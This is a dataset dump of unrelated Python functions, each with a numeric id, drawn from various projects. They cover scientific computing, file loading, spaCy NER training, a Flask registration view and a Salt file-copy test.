content
stringlengths
22
815k
id
int64
0
4.91M
def io_loop(): """ Create new io loop for each test, and tear it down after. """ loop = salt.ext.tornado.ioloop.IOLoop() loop.make_current() try: yield loop finally: loop.clear_current() loop.close(all_fds=True)
5,348,600
def inverse_sphere_distances(batch, dist, labels, anchor_label): """ Function to utilise the distances of batch samples to compute their probability of occurence, and using the inverse to sample actual negatives to the resp. anchor. Args: batch: torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape. dist: torch.Tensor(), computed distances between anchor to all batch samples. labels: np.ndarray, labels for each sample for which distances were computed in dist. anchor_label: float, anchor label Returns: distance_matrix, clamped to ensure no zero values are passed. """ bs,dim = len(dist),batch.shape[-1] #negated log-distribution of distances of unit sphere in dimension <dim> log_q_d_inv = ((2.0 - float(dim)) * torch.log(dist) - (float(dim-3) / 2) * torch.log(1.0 - 0.25 * (dist.pow(2)))) #Set sampling probabilities of positives to zero log_q_d_inv[np.where(labels==anchor_label)[0]] = 0 q_d_inv = torch.exp(log_q_d_inv - torch.max(log_q_d_inv)) # - max(log) for stability #Set sampling probabilities of positives to zero q_d_inv[np.where(labels==anchor_label)[0]] = 0 ### NOTE: Cutting of values with high distances made the results slightly worse. # q_d_inv[np.where(dist>upper_cutoff)[0]] = 0 #Normalize inverted distance for probability distr. q_d_inv = q_d_inv/q_d_inv.sum() return q_d_inv.detach().cpu().numpy()
5,348,601
def add_module_path(folder): """Adds a new search path to the list of search paths.""" import os __path__.append(os.path.abspath(folder))
5,348,602
def get_recording(sleeps=False): """Get list of recorded steps. :param sleeps: set False to exclude recording sleeps """ # TODO. atm will always use CLICK # TODO. Add examples global recording # pylint: disable=W0602 output = [] top = None action_name = "Click" for item in recording: if sleeps and item["type"] == "sleep": output.append(f"Sleep {item['value']}s") if ( item["type"] == "locator" and not top or "top" in item.keys() and item["top"] != top ): output.append( f"Control Window {item['top']} # Handle: {item['top_handle']}" ) top = item["top"] if item["type"] == "locator": output.append(f"{action_name} {item['locator']}") result = "\n".join(output) header = ( f"\n{'-'*80}" "\nCOPY & PASTE BELOW CODE INTO *** Tasks *** or *** Keywords ***" f"\n{'-'*80}\n\n" ) footer = f"\n\n{'-'*80}" return f"{header}{result}{footer}"
5,348,603
def wrap_onspace(text, width): """ A word-wrap function that preserves existing line breaks and most spaces in the text. Expects that existing line breaks are posix newlines (\n). """ return reduce(lambda line, word, width=width: '%s%s%s' % (line, ' \n'[(len(line[line.rfind('\n')+1:]) + len(word.split('\n', 1)[0]) >= width)], word), text.split(' '))
5,348,604
def xsd_simple_type_factory(elem, schema, parent): """ Factory function for XSD simple types. Parses the xs:simpleType element and its child component, that can be a restriction, a list or an union. Annotations are linked to simple type instance, omitting the inner annotation if both are given. """ annotation = None try: child = elem[0] except IndexError: return schema.maps.types[XSD_ANY_SIMPLE_TYPE] else: if child.tag == XSD_ANNOTATION: annotation = XsdAnnotation(elem[0], schema, child) try: child = elem[1] except IndexError: schema.parse_error("(restriction | list | union) expected", elem) return schema.maps.types[XSD_ANY_SIMPLE_TYPE] if child.tag == XSD_RESTRICTION: xsd_type = schema.BUILDERS.restriction_class(child, schema, parent) elif child.tag == XSD_LIST: xsd_type = XsdList(child, schema, parent) elif child.tag == XSD_UNION: xsd_type = schema.BUILDERS.union_class(child, schema, parent) else: schema.parse_error("(restriction | list | union) expected", elem) return schema.maps.types[XSD_ANY_SIMPLE_TYPE] if annotation is not None: xsd_type.annotation = annotation try: xsd_type.name = get_qname(schema.target_namespace, elem.attrib['name']) except KeyError: if parent is None: schema.parse_error("missing attribute 'name' in a global simpleType", elem) xsd_type.name = 'nameless_%s' % str(id(xsd_type)) else: if parent is not None: schema.parse_error("attribute 'name' not allowed for a local simpleType", elem) xsd_type.name = None if 'final' in elem.attrib: try: xsd_type._final = get_xsd_derivation_attribute(elem, 'final') except ValueError as err: xsd_type.parse_error(err, elem) return xsd_type
5,348,605
def test_add_user_to_group(onefs_client, created_user, created_group): """Ensure that a user can be added to a group successfully.""" assert onefs_client.add_user_to_group( user_name=created_user[0], group_name=created_group[0], ) is None
5,348,606
def setup_logger(run_mode="training", log_level=10, console_logging=True): """ Call logger create module and setup the logger for current run params: run_mode - str - optional - Default - training params: log_level - int - optional - Default - 20 - INFO params: console_logging - Boolean - optional - Enable console logging - default True """ log_dir = os.path.abspath(os.path.join(os.path.dirname(MODULE_DIR), ".", "logs")) log_file_name = f"{run_mode}_{os.path.basename(__file__).split('.')[0]}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log" global logger # Creates a logger logger = create_logger( log_level, console_logging, log_dir=log_dir, log_file_name=log_file_name )
5,348,607
def amen_solve(A, f, x0, eps, kickrank=4, nswp=20, local_prec='n', local_iters=2, local_restart=40, trunc_norm=1, max_full_size=50, verb=1): """ Approximate linear system solution in the tensor-train (TT) format using Alternating minimal energy (AMEN approach) :References: Sergey Dolgov, Dmitry. Savostyanov Paper 1: http://arxiv.org/abs/1301.6068 Paper 2: http://arxiv.org/abs/1304.1222 :param A: Matrix in the TT-format :type A: matrix :param f: Right-hand side in the TT-format :type f: tensor :param x0: TT-tensor of initial guess. :type x0: tensor :param eps: Accuracy. :type eps: float :Example: >>> import tt >>> import tt.amen #Needed, not imported automatically >>> a = tt.qlaplace_dd([8, 8, 8]) #3D-Laplacian >>> rhs = tt.ones(2, 3 * 8) #Right-hand side of all ones >>> x = tt.amen.amen_solve(a, rhs, rhs, 1e-8) amen_solve: swp=1, max_dx= 9.766E-01, max_res= 3.269E+00, max_rank=5 amen_solve: swp=2, max_dx= 4.293E-01, max_res= 8.335E+00, max_rank=9 amen_solve: swp=3, max_dx= 1.135E-01, max_res= 5.341E+00, max_rank=13 amen_solve: swp=4, max_dx= 9.032E-03, max_res= 5.908E-01, max_rank=17 amen_solve: swp=5, max_dx= 9.500E-04, max_res= 7.636E-02, max_rank=21 amen_solve: swp=6, max_dx= 4.002E-05, max_res= 5.573E-03, max_rank=25 amen_solve: swp=7, max_dx= 4.949E-06, max_res= 8.418E-04, max_rank=29 amen_solve: swp=8, max_dx= 9.618E-07, max_res= 2.599E-04, max_rank=33 amen_solve: swp=9, max_dx= 2.792E-07, max_res= 6.336E-05, max_rank=37 amen_solve: swp=10, max_dx= 4.730E-08, max_res= 1.663E-05, max_rank=41 amen_solve: swp=11, max_dx= 1.508E-08, max_res= 5.463E-06, max_rank=45 amen_solve: swp=12, max_dx= 3.771E-09, max_res= 1.847E-06, max_rank=49 amen_solve: swp=13, max_dx= 7.797E-10, max_res= 6.203E-07, max_rank=53 amen_solve: swp=14, max_dx= 1.747E-10, max_res= 2.058E-07, max_rank=57 amen_solve: swp=15, max_dx= 8.150E-11, max_res= 8.555E-08, max_rank=61 amen_solve: swp=16, max_dx= 2.399E-11, max_res= 4.215E-08, max_rank=65 amen_solve: swp=17, max_dx= 7.871E-12, max_res= 1.341E-08, max_rank=69 amen_solve: swp=18, max_dx= 3.053E-12, max_res= 6.982E-09, max_rank=73 >>> print (tt.matvec(a, x) - rhs).norm() / rhs.norm() 5.5152374305127345e-09 """ m = A.m.copy() rx0 = x0.r.copy() psx0 = x0.ps.copy() if A.is_complex or f.is_complex: amen_f90.amen_f90.ztt_amen_wrapper(f.d, A.n, m, A.tt.r, A.tt.ps, A.tt.core, f.r, f.ps, f.core, rx0, psx0, x0.core, eps, kickrank, nswp, local_iters, local_restart, trunc_norm, max_full_size, verb, local_prec) else: if x0.is_complex: x0 = x0.real() rx0 = x0.r.copy() psx0 = x0.ps.copy() amen_f90.amen_f90.dtt_amen_wrapper(f.d, A.n, m, A.tt.r, A.tt.ps, A.tt.core, f.r, f.ps, f.core, rx0, psx0, x0.core, eps, kickrank, nswp, local_iters, local_restart, trunc_norm, max_full_size, verb, local_prec) x = tt.tensor() x.d = f.d x.n = m.copy() x.r = rx0 if A.is_complex or f.is_complex: x.core = amen_f90.amen_f90.zcore.copy() else: x.core = amen_f90.amen_f90.core.copy() amen_f90.amen_f90.deallocate_result() x.get_ps() return x
5,348,608
def get_vss(ts, tau_p): """ Compute candidates of VS for specified task tau_p """ if tau_p == None: return [] C, T, D = extract(ts) R = rta(C, T) _VS = _get_vs(C, T, R, task_name_to_index(ts, tau_p)) _VS.sort() VS = [] vs = Server(0, 0, None) # ignore duplicates for s in _VS: if vs.C == s[0] and vs.T == s[1]: continue vs = Server(s[0], s[1], tau_p) VS.append(vs) return VS
5,348,609
def groupby( entities: Iterable["DXFEntity"], dxfattrib: str = "", key: "KeyFunc" = None ) -> Dict[Hashable, List["DXFEntity"]]: """ Groups a sequence of DXF entities by a DXF attribute like ``'layer'``, returns a dict with `dxfattrib` values as key and a list of entities matching this `dxfattrib`. A `key` function can be used to combine some DXF attributes (e.g. layer and color) and should return a hashable data type like a tuple of strings, integers or floats, `key` function example:: def group_key(entity: DXFEntity): return entity.dxf.layer, entity.dxf.color For not suitable DXF entities return ``None`` to exclude this entity, in this case it's not required, because :func:`groupby` catches :class:`DXFAttributeError` exceptions to exclude entities, which do not provide layer and/or color attributes, automatically. Result dict for `dxfattrib` = ``'layer'`` may look like this:: { '0': [ ... list of entities ], 'ExampleLayer1': [ ... ], 'ExampleLayer2': [ ... ], ... } Result dict for `key` = `group_key`, which returns a ``(layer, color)`` tuple, may look like this:: { ('0', 1): [ ... list of entities ], ('0', 3): [ ... ], ('0', 7): [ ... ], ('ExampleLayer1', 1): [ ... ], ('ExampleLayer1', 2): [ ... ], ('ExampleLayer1', 5): [ ... ], ('ExampleLayer2', 7): [ ... ], ... } All entity containers (modelspace, paperspace layouts and blocks) and the :class:`~ezdxf.query.EntityQuery` object have a dedicated :meth:`groupby` method. Args: entities: sequence of DXF entities to group by a DXF attribute or a `key` function dxfattrib: grouping DXF attribute like ``'layer'`` key: key function, which accepts a :class:`DXFEntity` as argument and returns a hashable grouping key or ``None`` to ignore this entity """ if all((dxfattrib, key)): raise DXFValueError( "Specify a dxfattrib or a key function, but not both." ) if dxfattrib != "": key = lambda entity: entity.dxf.get_default(dxfattrib) if key is None: raise DXFValueError( "no valid argument found, specify a dxfattrib or a key function, " "but not both." ) result: Dict[Hashable, List["DXFEntity"]] = dict() for dxf_entity in entities: if not dxf_entity.is_alive: continue try: group_key = key(dxf_entity) except DXFAttributeError: # ignore DXF entities, which do not support all query attributes continue if group_key is not None: group = result.setdefault(group_key, []) group.append(dxf_entity) return result
5,348,610
def py_binary(name, srcs=[], deps=[], main=None, base=None, **kwargs): """python binary. """ target = PythonBinary(name, srcs, deps, main, base, kwargs) build_manager.instance.register_target(target)
5,348,611
def train_test_split(data_filepath, num_train=10, num_test=10): """Split a dataset into training and test sets.""" df = pd.read_csv(data_filepath, sep=',', header=None) data = df.values train = data[:2*num_train, :] test = data[2*num_train:2*(num_train+num_test), :] ind = np.argsort(train[:,-1]) X_train = train[ind][:,:-1] y_train = train[ind][:,-1] ind = np.argsort(test[:,-1]) X_test = test[ind][:,:-1] y_test = test[ind][:,-1] return X_train, y_train, X_test, y_test
5,348,612
def get_filings(app: Flask = None): """Get a filing with filing_id.""" r = requests.get(f'{app.config["LEGAL_URL"]}/internal/filings') if not r or r.status_code != 200: app.logger.error(f'Failed to collect filings from legal-api. {r} {r.json()} {r.status_code}') raise Exception return r.json()
5,348,613
def _uno_struct__setattr__(self, name, value): """Sets attribute on UNO struct. Referenced from the pyuno shared library. """ return setattr(self.__dict__["value"], name, value)
5,348,614
def load_imgs_from_tree(data_dir, img_sub_folder=None, fovs=None, channels=None, dtype="int16", variable_sizes=False): """Takes a set of imgs from a directory structure and loads them into an xarray. Args: data_dir (str): directory containing folders of images img_sub_folder (str): optional name of image sub-folder within each fov fovs (list): optional list of folders to load imgs from. Default loads all folders channels (list): optional list of imgs to load, otherwise loads all imgs dtype (str/type): dtype of array which will be used to store values variable_sizes (bool): if true, will pad loaded images with zeros to fit into array Returns: xarray.DataArray: xarray with shape [fovs, x_dim, y_dim, tifs] """ iou.validate_paths(data_dir, data_prefix=False) if fovs is None: # get all fovs fovs = iou.list_folders(data_dir) fovs.sort() if len(fovs) == 0: raise ValueError(f"No fovs found in directory, {data_dir}") if img_sub_folder is None: # no img_sub_folder, change to empty string to read directly from base folder img_sub_folder = "" # get imgs from first fov if no img names supplied if channels is None: channels = iou.list_files( path_join(data_dir, fovs[0], img_sub_folder), substrs=['.tif', '.jpg', '.png'] ) # if taking all channels from directory, sort them alphabetically channels.sort() # otherwise, fill channel names with correct file extension elif not all([img.endswith(("tif", "tiff", "jpg", "png")) for img in channels]): # need this to reorder channels back because list_files may mess up the ordering channels_no_delim = [img.split('.')[0] for img in channels] all_channels = iou.list_files( path_join(data_dir, fovs[0], img_sub_folder), substrs=channels_no_delim, exact_match=True ) # get the corresponding indices found in channels_no_delim channels_indices = [channels_no_delim.index(chan.split('.')[0]) for chan in all_channels] # reorder back to original channels = [chan for _, chan in sorted(zip(channels_indices, all_channels))] if len(channels) == 0: raise ValueError("No images found in designated folder") test_img = io.imread( path_join(data_dir, fovs[0], img_sub_folder, channels[0], get_filehandle=True) ) # check to make sure that float dtype was supplied if image data is float data_dtype = test_img.dtype if np.issubdtype(data_dtype, np.floating): if not np.issubdtype(dtype, np.floating): warnings.warn(f"The supplied non-float dtype {dtype} was overwritten to {data_dtype}, " f"because the loaded images are floats") dtype = data_dtype if variable_sizes: img_data = np.zeros((len(fovs), 1024, 1024, len(channels)), dtype=dtype) else: img_data = np.zeros((len(fovs), test_img.shape[0], test_img.shape[1], len(channels)), dtype=dtype) for fov in range(len(fovs)): for img in range(len(channels)): if variable_sizes: temp_img = io.imread( path_join(data_dir, fovs[fov], img_sub_folder, channels[img], get_filehandle=True) ) img_data[fov, :temp_img.shape[0], :temp_img.shape[1], img] = temp_img else: img_data[fov, :, :, img] = io.imread(path_join(data_dir, fovs[fov], img_sub_folder, channels[img], get_filehandle=True)) # check to make sure that dtype wasn't too small for range of data if np.min(img_data) < 0: raise ValueError("Integer overflow from loading TIF image, try a larger dtype") if variable_sizes: row_coords, col_coords = range(1024), range(1024) else: row_coords, col_coords = range(test_img.shape[0]), range(test_img.shape[1]) # remove .tif or .tiff from image name img_names = [os.path.splitext(img)[0] for img in channels] img_xr = xr.DataArray(img_data, coords=[fovs, row_coords, col_coords, img_names], dims=["fovs", "rows", "cols", "channels"]) return img_xr
5,348,615
def register(): """Registers the user.""" if g.user: return redirect(url_for('user_home')) error = None if request.method == 'POST': if not request.form['username']: error = 'You have to enter a username' elif not request.form['email'] or '@' not in request.form['email']: error = 'You have to enter a valid email address' elif not request.form['password']: error = 'You have to enter a password' elif request.form['password'] != request.form['password2']: error = 'The two passwords do not match' elif get_uid(request.form['username']) is not None: error = 'The username is already taken' else: db = get_db() db.execute('''insert into user ( username, email, pw_hash, day, inc_log, dec_log, phase) values (?, ?, ?, 1, ?, ?, 1)''', [request.form['username'], request.form['email'], generate_password_hash(request.form['password']), datetime.datetime.utcnow(), datetime.datetime.utcnow()]) db.commit() flash('You were successfully registered and can login now') return redirect(url_for('login')) return render_template('register.html', error=error)
5,348,616
def test_single_while_2(): """ Feature: JIT Fallback Description: Test fallback with control flow. Expectation: No exception. """ @ms_function def control_flow_while(): x = Tensor(7).astype("int32") y = Tensor(0).astype("int32") while x >= y: y += x return y res = control_flow_while() assert res == 14
5,348,617
def build_and_predict_model(ml_input_df): """ Create a standardized feature matrix X and target array y. Returns the model and accuracy statistics """ import cuml from cuml.metrics import confusion_matrix feature_names = ["college_education", "male"] + [ "clicks_in_%d" % i for i in range(1, 8) ] X = ml_input_df[feature_names] # Standardize input matrix X = (X - X.mean()) / X.std() y = ml_input_df["clicks_in_category"] model = cuml.LogisticRegression( tol=convergence_tol, penalty="none", solver="qn", fit_intercept=True, max_iter=iterations, C=C, ) model.fit(X, y) # # Predict and evaluate accuracy # (Should be 1.0) at SF-1 # results_dict = {} y_pred = model.predict(X) results_dict["auc"] = roc_auc_score(y.to_array(), y_pred.to_array()) results_dict["precision"] = cupy_precision_score(cp.asarray(y), cp.asarray(y_pred)) results_dict["confusion_matrix"] = confusion_matrix( cp.asarray(y, dtype="int32"), cp.asarray(y_pred, dtype="int32") ) results_dict["output_type"] = "supervised" return results_dict
5,348,618
def codes_new_from_file(fileobj, product_kind, headers_only=False): """ @brief Load in memory a message from a file for a given product. The message can be accessed through its id and will be available\n until @ref grib_release is called.\n \b Examples: \ref get_product_kind.py "get_product_kind.py" @param fileobj python file object @param product_kind one of CODES_PRODUCT_GRIB, CODES_PRODUCT_BUFR, CODES_PRODUCT_GTS or CODES_PRODUCT_ANY @param headers_only whether or not to load the message with the headers only @return id of the message loaded in memory @exception GribInternalError """ if product_kind == CODES_PRODUCT_GRIB: return grib_new_from_file(fileobj, headers_only) if product_kind == CODES_PRODUCT_BUFR: return bufr_new_from_file(fileobj, headers_only) if product_kind == CODES_PRODUCT_METAR: return metar_new_from_file(fileobj, headers_only) if product_kind == CODES_PRODUCT_GTS: return gts_new_from_file(fileobj, headers_only) if product_kind == CODES_PRODUCT_ANY: return any_new_from_file(fileobj, headers_only) raise Exception("Invalid product kind: " + product_kind)
5,348,619
def list_resources(path, long_format=None, relations=False): """List resources in a given DMF workspace. Args: path (str): Path to the workspace long_format (bool): List in long format flag relations (bool): Show relationships, in long format Returns: None """ t = ColorTerm() d = DMF(path) if long_format: resources = list(d.find()) uuid_pfx = _uuid_prefix([r.uuid for r in resources]) fields = ("uuid", "name", "type", "modified", "created") widths = (uuid_pfx, 30, 20, 19, 19) colors = (t.green, t.white, t.yellow, t.white, t.white) fmts = [f"{{:{w}s}}" for w in widths] left_gutter = "| " if relations else "" # table header print( " " * len(left_gutter) + t.bold + " ".join([f.format(v) for f, v in zip(fmts, fields)]) + t.reset ) def datestr(t): return datetime.isoformat(datetime.fromtimestamp(t)) # table body for r in resources: values = list(getattr(r, k) for k in fields[:-2]) values.append(datestr(r.modified)) values.append(datestr(r.created)) if not values[1] and r.desc: values[1] = r.desc[: widths[1]] else: values[1] = values[1][: widths[1]] if uuid_pfx < 32: values[0] = values[0][:uuid_pfx] print( left_gutter + " ".join([c + f.format(v) for c, f, v in zip(colors, fmts, values)]) + t.reset ) if relations and len(r.relations) > 0: relitems = [] for rel in r.relations: if rel.subject == r.uuid: fmt = f"{t.white}{{p}}->{t.blue}{{o}}" else: fmt = f"{t.blue}{{s}}->{t.white}{{p}}" item = fmt.format( s=rel.subject[:uuid_pfx], p=rel.predicate, o=rel.object[:uuid_pfx], ) relitems.append(item) print(f"+-- {' / '.join(relitems)}") else: items = [] for r in d.find(): name_color = "w" if r.name: name = r.name elif r.desc: name = r.desc[:40] name_color = t.blue else: name = r.uuid name_color = t.green item = f"{name_color}{name}{t.yellow}:{r.type}" items.append(item) if items: columnized = _display_in_columns(items, max_line=t.width) print(columnized + t.reset)
5,348,620
def calc_streamtemp(tas): """ Global standard regression equation from Punzet et al. (2012) Calculates grid cell stream temperature based on air temperature Both input and output temperature are in K""" # global constants, taken from Punzet et al., 2012 c0 = 32; c1 = -0.13; c2 = 1.94 tas_C = tas - 273.15 streamtemp_C = c0/(1+np.exp(c1*tas_C+c2)) streamtemp = streamtemp_C + 273.15 return streamtemp
5,348,621
def _process(proc_data): """ Final processing to conform to the schema. Parameters: proc_data: (List of Dictionaries) raw structured data to process Returns: List of Dictionaries. Structured data to conform to the schema. """ # nothing more to process return proc_data
5,348,622
def _extractor_image_dependencies(): """Defines external repositories necessary for extractor images.""" go_repository( name = "com_github_bazelbuild_bazelisk", importpath = "github.com/bazelbuild/bazelisk", tag = "v1.3.0", ) go_repository( name = "com_github_mitchellh_go_homedir", importpath = "github.com/mitchellh/go-homedir", tag = "v1.1.0", ) go_repository( name = "com_github_hashicorp_go_version", importpath = "github.com/hashicorp/go-version", tag = "v1.1.0", )
5,348,623
def get_station_info(my_token, station_id): """ This function gets all the information on the station ---------- Input: my_token (str) token generated from "token request page" station_id (str) ---------- Output: dictionary of station information """ station_url = '{}stations/{}'.format(base_url, station_id) return requests.get(station_url, headers = {'token': my_token}).json()
5,348,624
def start(task): """ Start cache and start the Stanford parser """ startCache(task) startServer(task.stanfordParserConfig())
5,348,625
def test_salt_cp(master, minion, salt_cp, tempfiles): """ Test copying a file from the master to the minion """ tfile = tempfile.NamedTemporaryFile(delete=True) tfile.close() dest = tfile.name try: contents = "id: foo" sls = tempfiles.makeslsfile(contents) assert master.is_alive() assert minion.is_alive() ret = salt_cp.run("minion-1", sls, dest) assert ret.exitcode == 0, ret assert ret.json == {"minion-1": {dest: True}}, ret assert os.path.exists(dest) with open(dest) as rfh: assert rfh.read() == contents finally: if os.path.exists(dest): os.unlink(dest) tfile = tempfile.NamedTemporaryFile(delete=True) tfile.close() dest = tfile.name try: contents = "id: foo" sls = tempfiles.makeslsfile(contents) assert master.is_alive() assert minion.is_alive() ret = salt_cp.run(sls, dest, minion_tgt="minion-1") assert ret.exitcode == 0, ret assert ret.json == {dest: True}, ret assert os.path.exists(dest) with open(dest) as rfh: assert rfh.read() == contents finally: if os.path.exists(dest): os.unlink(dest)
5,348,626
def json_response(f, *args, **kwargs): """Wrap a view in JSON. This decorator runs the given function and looks out for ajax.AJAXError's, which it encodes into a proper HttpResponse object. If an unknown error is thrown it's encoded as a 500. All errors are then packaged up with an appropriate Content-Type and a JSON body that you can inspect in JavaScript on the client. They look like: { "message": "Error message here.", "code": 500 } Please keep in mind that raw exception messages could very well be exposed to the client if a non-AJAXError is thrown. """ try: result = f(*args, **kwargs) except AJAXError, e: result = e.get_response() except Exception, e: import sys type, message, trace = sys.exc_info() if settings.DEBUG: import traceback tb = [{'file': l[0], 'line': l[1], 'in': l[2], 'code': l[3]} for l in traceback.extract_tb(trace)] result = AJAXError(500, message, traceback=tb).get_response() else: result = AJAXError(500, message).get_response() result['Content-Type'] = 'application/json' return result
5,348,627
def tests_pyenv(session: nox_poetry.Session): """ Runs pytest with coverage on the latest patch of each available pyenv minor python version at least 3.7. """ _run_tests(session)
5,348,628
def check_fit_input(coordinates, data, weights, unpack=True): """ Validate the inputs to the fit method of gridders. Checks that the coordinates, data, and weights (if given) all have the same shape. Weights arrays are raveled. Parameters ---------- coordinates : tuple of arrays Arrays with the coordinates of each data point. Should be in the following order: (easting, northing, vertical, ...). data : array or tuple of arrays The data values of each data point. Data can have more than one component. In such cases, data should be a tuple of arrays. weights : None or array If not None, then the weights assigned to each data point. Typically, this should be 1 over the data uncertainty squared. If the data has multiple components, the weights have the same number of components. unpack : bool If False, data and weights will be tuples always. If they are single arrays, then they will be returned as a 1-element tuple. If True, will unpack the tuples if there is only 1 array in each. Returns ------- validated_inputs The validated inputs in the same order. If weights are given, will ravel the array before returning. """ data = check_data(data) weights = check_data(weights) coordinates = check_coordinates(coordinates) if any(i.shape != coordinates[0].shape for i in data): raise ValueError( "Data arrays must have the same shape {} as coordinates. Data shapes: {}.".format( coordinates[0].shape, [i.shape for i in data] ) ) if any(w is not None for w in weights): if len(weights) != len(data): raise ValueError( "Number of data '{}' and weights '{}' must be equal.".format( len(data), len(weights) ) ) if any(i.size != j.size for i in weights for j in data): raise ValueError("Weights must have the same size as the data array.") weights = tuple(i.ravel() for i in weights) else: weights = tuple([None] * len(data)) if unpack: if len(weights) == 1: weights = weights[0] if len(data) == 1: data = data[0] return coordinates, data, weights
5,348,629
def main(): """ Main :return: void """ a = ProbabilityTable({"Werewolf": 3, "Possessed": 1, "Villager": 8, "Bodyguard": 1, "Medium": 1, "Seer": 1}, ["Player1", "Player2", "Player3", "Player4", "Player5", "Player6", "Player7", "Player8", "Player9", "Player10", "Player11", "Player12", "Player13", "Player14", "Player15"], ["Werewolf", "Possessed", "Villager", "Bodyguard", "Medium", "Seer"]) # a.verify() for i in range(15): for j in range(6): t = a.table[i, j] a.add(i, j, -.1) print(a.table[i, j] - t) # a.add(4, 4, .9) # a.display() # a.verify()
5,348,630
def _sigint_handler(sig, frame): """Signal handler for ^C.""" global polite_stop if not polite_stop: print('Stop requested. Regression will stop safely at next iteration. ' 'Press ^C again to force quit.') polite_stop = True else: print('Force quitting now.') exit()
5,348,631
def get_logger(name, handler=logging.StreamHandler(sys.stderr), level=logging.DEBUG): """ encapsulate get logger operation :param name: logger name :param handler: logger handler, default is stderr :param level: logger level, default is debug :return: logger """ logger = logging.getLogger(name) handler.setFormatter(logging.Formatter('[%(asctime)s] [{}] %(message)s'.format(name))) logger.addHandler(handler) logger.setLevel(level) return logger
5,348,632
def update_params(layers, param_grads, learning_rate): """ Function to update the parameters of the given layers with the given gradients by gradient descent with the given learning rate. """ for layer, layer_backprop_grads in zip(layers, param_grads): for param, grad in zip(layer.get_params_iter(), layer_backprop_grads): # The parameter returned by the iterator point to the memory space of # the original layer and can thus be modified inplace. param -= learning_rate * grad # Update each parameter
5,348,633
def get_local_beneficiaries(map_lat: float, map_lng: float, map_zoom: int) -> DataFrame: """Return only projects that are fairly close to the map's centre.""" return beneficiaries[ (map_lat - 100 / map_zoom < beneficiaries.lat) & (beneficiaries.lat < map_lat + 100 / map_zoom) & (map_lng - 100 / map_zoom < beneficiaries.lng) & (beneficiaries.lng < map_lng + 100 / map_zoom) ][:500]
5,348,634
def parse_args(args): """ Parse command line parameters :param args: command line parameters as list of strings :return: command line parameters as :obj:`argparse.Namespace` """ parser = argparse.ArgumentParser( description="Build html reveal.js slides from markdown in docs/ dir") parser.add_argument( '-v', '--verbose', help='Whether to show progress messages on stdout, including HTML', action='store_true') parser.add_argument( '--version', help='print twip package version and exit.', action='version', version='twip {ver}'.format(ver=__version__)) parser.add_argument( '-b', '--blog_path', help='Path to source markdown files. Must contain an `images` subdir', default=BLOG_PATH) parser.add_argument( '-s', '--slide_path', help='Path to dir for output slides (HTML). An images subdir will be added. A slides subdir should already exist.', default=DOCS_PATH) parser.add_argument( '-p', '--presentation', help='Source markdown base file name (without .md extension). The HTML slides will share the same basename.', default='2015-10-27-Hacking-Oregon-Hidden-Political-Connections') return parser.parse_args(args)
5,348,635
def main(model=None, new_model_name="imasc", output_dir="IMaSC", n_iter=10): """Set up the pipeline and entity recognizer, and train the new entity.""" random.seed(0) if model is not None: nlp = spacy.load(model) # load existing spaCy model print("Loaded model '%s'" % model) else: nlp = spacy.blank("en") # create blank Language class print("Created blank 'en' model") # Add entity recognizer to model if it's not in the pipeline # nlp.create_pipe works for built-ins that are registered with spaCy if "ner" not in nlp.pipe_names: ner = nlp.create_pipe("ner") nlp.add_pipe(ner) # otherwise, get it, so we can add labels to it else: ner = nlp.get_pipe("ner") for label in LABEL: ner.add_label(label) # add new entity label to entity recognizer if model is None: optimizer = nlp.begin_training() else: optimizer = nlp.resume_training() move_names = list(ner.move_names) # get names of other pipes to disable them during training pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"] other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions] # only train NER with nlp.disable_pipes(*other_pipes) and warnings.catch_warnings(): # show warnings for misaligned entity spans once warnings.filterwarnings("once", category=UserWarning, module='spacy') sizes = compounding(1.0, 4.0, 1.001) # batch up the examples using spaCy's minibatch for itn in range(n_iter): random.shuffle(TRAIN_DATA) # Need some oversampling somewhere in here batches = minibatch(TRAIN_DATA, size=sizes) losses = {} for batch in batches: texts, annotations = zip(*batch) nlp.update(texts, annotations, sgd=optimizer, drop=0.35, losses=losses) #print("Losses", losses) # test the trained model test_text = "We will show with scatter diagrams of water vapor and ozone mixing ratios from the balloon soundings that there are signicant seasonal differences in the contributions from wave, source, and path variability. We augment the analysis by comparing the variance in the balloon soundings to simulated proles constructed from water vapor and ozone data from the Aura Microwave Limb Sounder (MLS) using a new reverse domain lling technique." doc = nlp(test_text) print("Entities in '%s'" % test_text) for ent in doc.ents: print(ent.label_, ent.text) # save model to output directory if output_dir is not None: output_dir = Path(output_dir) if not output_dir.exists(): output_dir.mkdir() nlp.meta["name"] = new_model_name # rename model nlp.to_disk(output_dir) print("Saved model to", output_dir) # test the saved model print("Loading from", output_dir) nlp2 = spacy.load(output_dir) # Check the classes have loaded back consistently assert nlp2.get_pipe("ner").move_names == move_names doc2 = nlp2(test_text) for ent in doc2.ents: print(ent.label_, ent.text)
5,348,636
def imayavi_remove_source(src): """Safely remove a specific vtk source Args: src (vtk_data_source): vtk data source to remove """ src.stop() try: try: src.data.release_data() except TraitError: src.data.release_data_flag = 1 src.cell_scalars_name = '' src.cell_tensors_name = '' src.cell_vectors_name = '' src.point_scalars_name = '' src.point_tensors_name = '' src.point_vectors_name = '' except AttributeError: pass src.start() src.stop() src.remove()
5,348,637
def lines_to_word_occurrences(in_file, stdout): """For each line of input, output (word, 1) for each word in the line""" for line in in_file: for word in WORD_RE.findall(line): _write(stdout, word, 1)
5,348,638
def create_atoms(atoms, atom_dict): """Transform the atom types in a molecule (e.g., H, C, and O) into the indices (e.g., H=0, C=1, and O=2). """ atoms = [atom_dict[a] for a in atoms] return np.array(atoms)
5,348,639
def uint2float(A,bits,x_min,x_max=None): """ Converts uint[bits] to the corresponding floating point value in the range [x_min,x_max]. """ if x_max is None: x_min,x_max = x_range(x_min) return x_min + (x_max - x_min) * A / ((1 << bits) - 1)
5,348,640
def test_get_all_pos_error(): """Check that we get an error when we don't specify qso.""" cat = catalog.Catalog("foo") with pytest.raises(ValueError, match="Only know how to do QSOs right now"): cat.get_all_pos() return
5,348,641
def partCmp(verA: str, verB: str) -> int: """Compare parts of a semver. Args: verA (str): lhs part to compare verB (str): rhs part to compare Returns: int: 0 if equal, 1 if verA > verB and -1 if verA < verB """ if verA == verB or verA == "*" or verB == "*": return 0 if int(verA) > int(verB): return 1 return -1
5,348,642
